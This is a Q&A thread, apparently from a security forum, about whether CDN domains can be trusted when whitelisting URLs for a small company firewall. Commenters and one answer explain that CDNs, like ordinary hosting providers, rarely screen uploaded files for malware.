3

I am trying to whitelist URLs for my PC but I want to eventually roll out the rules to my small company's firewall.

But I'm having trouble with CDNs since a page may load content from many distinct URLs.

Do CDNs do any content filter to allow me to trust general CDN URLs? (example *.cloudfront.net) or should this be generally avoided and create rules in a per page basis?

Cheers!

JuanKB1024
  • 133
  • 1
  • 3
  • I do not know what you really expect when mentioning "content filtering" but CDN are comparable to any other hosting company, they are not aimed to filter or alter their customer's content. In case of a legal issue, someone can get in touch with the CDN has he would do with an hosting company, but I do not imagine that the CDN would take the initiative to alter or filter their customer's data in any way without their approval or allowing enough time for the customer to handle the issue himself. They are a Content Delivery Network, not an application firewall... – WhiteWinterWolf Apr 28 '15 at 16:03
  • What I meant for "content filtering" was if they by any measure flag any file as malicious such as a jquery.js file that's been tampered with some keylogger or some 0-day browser exploit. – JuanKB1024 Apr 28 '15 at 18:39
  • @JuanKB1024 CDNs are no less safe from malicious people intentionally using these services to deliver malware - if I had money to burn, I could sign up and make them serve my evil jquery.js, and it'll be out there doing damage until someone actually complains about it, so no, files hosted on CDNs don't magically become malware-free. –  Apr 29 '15 at 06:27
  • Actually, it happens more and more often that I see some "borderline" website showing a CDN error page telling the backend site is not reachable. This does not mean in any way that CDN filters anything, on the contrary I merely have the impression that more and more groups are using CDN to hide the real location of their servers... – WhiteWinterWolf Apr 29 '15 at 09:43
  • Thanks Andre and WWW. I guess the answer is no then. For my purposes, whitelisting every sub alias of a CDN is overkill so I guess I'll leave it as it is. – JuanKB1024 Apr 29 '15 at 19:01

1 Answers1

1

I note that you've gotten your answer from the comments, but I will chime in and create a proper answer to this question.

a CDN works just like a regular hosting company. You pay for diskspace, and the CDN makes sure the content you upload is available to you, and often distributed around the globe for faster access. Anyone who has the cash can register and upload their files on a CDN. Some even accept payment in Bitcoin, making it much less of a risk uploading malicious files.

CDNs rarely do any content filtering, and I would guess that very few do any proactive screening of the files uploaded. How should the CDN know if the uploaded file is malicious? One mans JavaScript may not differ to much from that of another, but one of them could be used with malicious intent while the other one just provide a slider for a blog. It's impossible to know for sure!

If you ever experience malware hosted on a CDN, you could send them an email to have it removed/flagged. (Like what MaxCDN does) But there is no guarantee that X CDN will remove it, and if they do, it might even be too late!

You could make a whitelist of well-known CDNs, that you know take quick actions regarding hosted malware, and that might protect you a little (and it's certainly better than nothing!). But this is no guarantee, and I would suggest adding additional software/hardware to protect against malicious intent, and not just a whitelist.

Mrtn
  • 1,274
  • 10
  • 18